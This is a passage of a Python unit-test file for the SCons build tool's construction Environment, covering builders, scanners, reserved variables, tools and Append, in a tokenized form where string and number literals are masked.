MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CCFLAGS = None ) <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( ) <EOL> env . MergeFlags ( { '<STR_LIT:A>' : [ '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' ] } ) <EOL> assert env [ '<STR_LIT:A>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT:A>' ] <EOL> assert env [ '<STR_LIT:B>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT:B>' ] <EOL> class BaseTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> reserved_variables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env1 == env2 , diff_env ( env1 , env2 ) <EOL> assert not env1 . has_key ( '<STR_LIT>' ) <EOL> assert not env2 . has_key ( '<STR_LIT>' ) <EOL> def test_variables ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeOptions : <EOL> def __init__ ( self , key , val ) : <EOL> self . calls = <NUM_LIT:0> <EOL> self . key = key <EOL> self . val = val <EOL> def keys ( self ) : <EOL> return [ self . key ] <EOL> def Update ( self , env ) : <EOL> env [ self . key ] = self . val <EOL> self . calls = self . calls + <NUM_LIT:1> <EOL> o = FakeOptions ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> env = Environment ( variables = o , AAA = '<STR_LIT>' ) <EOL> assert o . calls == <NUM_LIT:1> , o . 
calls <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( aaa = '<STR_LIT>' ) <EOL> x = env . get ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env . get ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> x = env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_Builder_calls ( self ) : <EOL> """<STR_LIT>""" <EOL> global called_it <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> env = Environment ( ) <EOL> env . Replace ( BUILDERS = { '<STR_LIT>' : b1 , <EOL> '<STR_LIT>' : b2 } ) <EOL> called_it = { } <EOL> env . builder1 ( '<STR_LIT>' ) <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == [ '<STR_LIT>' ] , called_it <EOL> called_it = { } <EOL> env . builder2 ( source = '<STR_LIT>' , xyzzy = <NUM_LIT:1> ) <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == [ '<STR_LIT>' ] , called_it <EOL> assert called_it [ '<STR_LIT>' ] == <NUM_LIT:1> , called_it <EOL> called_it = { } <EOL> env . builder1 ( foo = '<STR_LIT:bar>' ) <EOL> assert called_it [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' , called_it <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == None , called_it <EOL> def test_BuilderWrapper_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> e1 = Environment ( ) <EOL> e2 = Environment ( ) <EOL> e1 . Replace ( BUILDERS = { '<STR_LIT:b>' : b1 } ) <EOL> bw = e1 . b <EOL> assert bw . env is e1 <EOL> bw . env = e2 <EOL> assert bw . env is e2 <EOL> assert bw . builder is b1 <EOL> bw . builder = b2 <EOL> assert bw . builder is b2 <EOL> self . assertRaises ( AttributeError , getattr , bw , '<STR_LIT>' ) <EOL> bw . 
foobar = <NUM_LIT> <EOL> assert bw . foobar is <NUM_LIT> <EOL> def _DO_NOT_test_Builder_execs ( self ) : <EOL> """<STR_LIT>""" <EOL> global built_it <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> built_it = { } <EOL> env3 = Environment ( ) <EOL> env3 . Replace ( BUILDERS = { '<STR_LIT>' : b1 , <EOL> '<STR_LIT>' : b2 } ) <EOL> env3 . builder1 . execute ( target = '<STR_LIT>' ) <EOL> env3 . builder2 . execute ( target = '<STR_LIT>' ) <EOL> env3 . builder1 . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> env4 = env3 . Clone ( ) <EOL> assert env4 . builder1 . env is env4 , "<STR_LIT>" % ( <EOL> env4 . builder1 . env , env3 ) <EOL> assert env4 . builder2 . env is env4 , "<STR_LIT>" % ( <EOL> env4 . builder1 . env , env3 ) <EOL> built_it = { } <EOL> env5 = self . TestEnvironment ( BUILDERS = { '<STR_LIT:foo>' : b1 } ) <EOL> env5 [ '<STR_LIT>' ] [ '<STR_LIT:bar>' ] = b2 <EOL> env5 . foo . execute ( target = '<STR_LIT>' ) <EOL> env5 . bar . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> built_it = { } <EOL> env6 = Environment ( ) <EOL> env6 [ '<STR_LIT>' ] = { '<STR_LIT:foo>' : b1 , <EOL> '<STR_LIT:bar>' : b2 } <EOL> env6 . foo . execute ( target = '<STR_LIT>' ) <EOL> env6 . bar . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> def test_Scanners ( self ) : <EOL> """<STR_LIT>""" <EOL> global scanned_it <EOL> s1 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> s2 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" ] ) <EOL> s3 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> suffixes = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> env = Environment ( ) <EOL> try : del env [ '<STR_LIT>' ] <EOL> except KeyError : pass <EOL> s = map ( env . 
get_scanner , suffixes ) <EOL> assert s == [ None , None , None , None , None ] , s <EOL> env = self . TestEnvironment ( SCANNERS = [ ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ None , None , None , None , None ] , s <EOL> env . Replace ( SCANNERS = [ s1 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , None , None ] , s <EOL> env . Append ( SCANNERS = [ s2 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , None ] , s <EOL> env . AppendUnique ( SCANNERS = [ s3 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , s3 ] , s <EOL> env = env . Clone ( SCANNERS = [ s2 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ None , None , None , s2 , None ] , s <EOL> env [ '<STR_LIT>' ] = [ s1 ] <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , None , None ] , s <EOL> env . PrependUnique ( SCANNERS = [ s2 , s1 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , None ] , s <EOL> env . Prepend ( SCANNERS = [ s3 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s3 , s3 ] , s <EOL> def test_ENV ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env . Dictionary ( '<STR_LIT>' ) [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_ReservedVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> reserved_variables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> warning = SCons . Warnings . ReservedVariableWarning <EOL> SCons . Warnings . enableWarningClass ( warning ) <EOL> old = SCons . Warnings . 
warningAsException ( <NUM_LIT:1> ) <EOL> try : <EOL> env4 = Environment ( ) <EOL> for kw in self . reserved_variables : <EOL> exc_caught = None <EOL> try : <EOL> env4 [ kw ] = '<STR_LIT>' <EOL> except warning : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % kw <EOL> assert not env4 . has_key ( kw ) , "<STR_LIT>" % kw <EOL> finally : <EOL> SCons . Warnings . warningAsException ( old ) <EOL> def test_FutureReservedVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> future_reserved_variables = [ ] <EOL> warning = SCons . Warnings . FutureReservedVariableWarning <EOL> SCons . Warnings . enableWarningClass ( warning ) <EOL> old = SCons . Warnings . warningAsException ( <NUM_LIT:1> ) <EOL> try : <EOL> env4 = Environment ( ) <EOL> for kw in future_reserved_variables : <EOL> exc_caught = None <EOL> try : <EOL> env4 [ kw ] = '<STR_LIT>' <EOL> except warning : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % kw <EOL> assert env4 . has_key ( kw ) , "<STR_LIT>" % kw <EOL> finally : <EOL> SCons . Warnings . warningAsException ( old ) <EOL> def test_IllegalVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> def test_it ( var , env = env ) : <EOL> exc_caught = None <EOL> try : <EOL> env [ var ] = <NUM_LIT:1> <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % var <EOL> env [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> test_it ( '<STR_LIT>' ) <EOL> test_it ( '<STR_LIT>' ) <EOL> test_it ( '<STR_LIT>' ) <EOL> def test_autogenerate ( dict ) : <EOL> """<STR_LIT>""" <EOL> drive , p = os . path . splitdrive ( os . getcwd ( ) ) <EOL> def normalize_path ( path , drive = drive ) : <EOL> if path [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> path = drive + path <EOL> path = os . path . normpath ( path ) <EOL> drive , path = os . path . splitdrive ( path ) <EOL> return string . 
lower ( drive ) + path <EOL> env = dict . TestEnvironment ( LIBS = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] , <EOL> LIBLINKPREFIX = '<STR_LIT:foo>' , <EOL> LIBLINKSUFFIX = '<STR_LIT:bar>' ) <EOL> def RDirs ( pathlist , fs = env . fs ) : <EOL> return fs . Dir ( '<STR_LIT>' ) . Rfindalldirs ( pathlist ) <EOL> env [ '<STR_LIT>' ] = RDirs <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> assert flags == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , flags <EOL> blat = env . fs . Dir ( '<STR_LIT>' ) <EOL> env . Replace ( CPPPATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT:bar>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert flags == expect , flags <EOL> env . Replace ( F77PATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT:bar>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert flags == expect , flags <EOL> env . Replace ( CPPPATH = '<STR_LIT>' , F77PATH = '<STR_LIT>' , LIBPATH = '<STR_LIT>' ) <EOL> l = env . subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> l = env . subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> l = env . 
subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> env . fs . Repository ( '<STR_LIT>' ) <EOL> env . fs . Repository ( '<STR_LIT>' ) <EOL> env . Replace ( CPPPATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' <EOL> ] <EOL> def normalize_if_path ( arg , np = normalize_path ) : <EOL> if arg not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return np ( str ( arg ) ) <EOL> return arg <EOL> flags = map ( normalize_if_path , flags ) <EOL> assert flags == expect , flags <EOL> def test_platform ( self ) : <EOL> """<STR_LIT>""" <EOL> class platform : <EOL> def __str__ ( self ) : return "<STR_LIT>" <EOL> def __call__ ( self , env ) : env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def tool ( env ) : <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> env = self . 
TestEnvironment ( platform = platform ( ) , tools = [ tool ] ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> def test_Default_PLATFORM ( self ) : <EOL> """<STR_LIT>""" <EOL> class platform : <EOL> def __str__ ( self ) : return "<STR_LIT>" <EOL> def __call__ ( self , env ) : env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def tool ( env ) : <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> import SCons . Defaults <EOL> save = SCons . Defaults . ConstructionEnvironment . copy ( ) <EOL> try : <EOL> import SCons . Defaults <EOL> SCons . Defaults . ConstructionEnvironment . update ( { <EOL> '<STR_LIT>' : platform ( ) , <EOL> } ) <EOL> env = self . TestEnvironment ( tools = [ tool ] ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> finally : <EOL> SCons . Defaults . ConstructionEnvironment = save <EOL> def test_tools ( self ) : <EOL> """<STR_LIT>""" <EOL> def t1 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t2 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t3 ( env ) : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] <EOL> def t4 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> env = self . TestEnvironment ( tools = [ t1 , t2 , t3 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> t4 ( env ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ ( '<STR_LIT>' , { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> , '<STR_LIT:c>' : <NUM_LIT:3> } ) ] , <EOL> toolpath = [ test . 
workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT:a>' ] == <NUM_LIT:1> , env [ '<STR_LIT:a>' ] <EOL> assert env [ '<STR_LIT:b>' ] == <NUM_LIT:2> , env [ '<STR_LIT:b>' ] <EOL> assert env [ '<STR_LIT:c>' ] == <NUM_LIT:3> , env [ '<STR_LIT:c>' ] <EOL> def test_Default_TOOLS ( self ) : <EOL> """<STR_LIT>""" <EOL> def t5 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t6 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t7 ( env ) : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] <EOL> def t8 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> import SCons . Defaults <EOL> save = SCons . Defaults . ConstructionEnvironment . copy ( ) <EOL> try : <EOL> SCons . Defaults . ConstructionEnvironment . update ( { <EOL> '<STR_LIT>' : [ t5 , t6 , t7 ] , <EOL> } ) <EOL> env = Environment ( XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> t8 ( env ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> finally : <EOL> SCons . Defaults . ConstructionEnvironment = save <EOL> def test_null_tools ( self ) : <EOL> """<STR_LIT>""" <EOL> def t1 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t2 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> env = self . TestEnvironment ( tools = [ t1 , None , t2 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> env = self . TestEnvironment ( tools = [ None ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> env = self . 
TestEnvironment ( tools = [ t1 , '<STR_LIT>' , t2 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> def test_concat ( self ) : <EOL> "<STR_LIT>" <EOL> e1 = self . TestEnvironment ( PRE = '<STR_LIT>' , SUF = '<STR_LIT>' , STR = '<STR_LIT>' , LIST = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> s = e1 . subst <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_gvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' , ZZZ = '<STR_LIT:z>' ) <EOL> gvars = env . gvars ( ) <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:x>' , gvars [ '<STR_LIT>' ] <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:y>' , gvars [ '<STR_LIT>' ] <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:z>' , gvars [ '<STR_LIT>' ] <EOL> def test__update ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( X = '<STR_LIT:x>' , Y = '<STR_LIT:y>' , Z = '<STR_LIT:z>' ) <EOL> assert env [ '<STR_LIT:X>' ] == '<STR_LIT:x>' , env [ '<STR_LIT:X>' ] <EOL> assert env [ '<STR_LIT:Y>' ] == '<STR_LIT:y>' , env [ '<STR_LIT:Y>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:z>' , env [ '<STR_LIT>' ] <EOL> env . 
_update ( { '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:t>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env [ '<STR_LIT:X>' ] == '<STR_LIT>' , env [ '<STR_LIT:X>' ] <EOL> assert env [ '<STR_LIT:Y>' ] == '<STR_LIT:y>' , env [ '<STR_LIT:Y>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:t>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:s>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_Append ( self ) : <EOL> """<STR_LIT>""" <EOL> b1 = Environment ( ) [ '<STR_LIT>' ] <EOL> b2 = Environment ( ) [ '<STR_LIT>' ] <EOL> assert b1 == b2 , diff_dict ( b1 , b2 ) <EOL> import UserDict <EOL> UD = UserDict . UserDict <EOL> import UserList <EOL> UL = UserList . 
UserList <EOL> cases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT:3>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' , '<STR_LIT:I>' , '<STR_LIT:1>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , [ '<STR_LIT>' ] , { '<STR_LIT>' : <NUM_LIT:1> 
, '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UL ( [ '<STR_LIT>' ] ) , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , '<STR_LIT>' , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ '<STR_LIT>' ] , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UL ( [ '<STR_LIT>' ] ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , 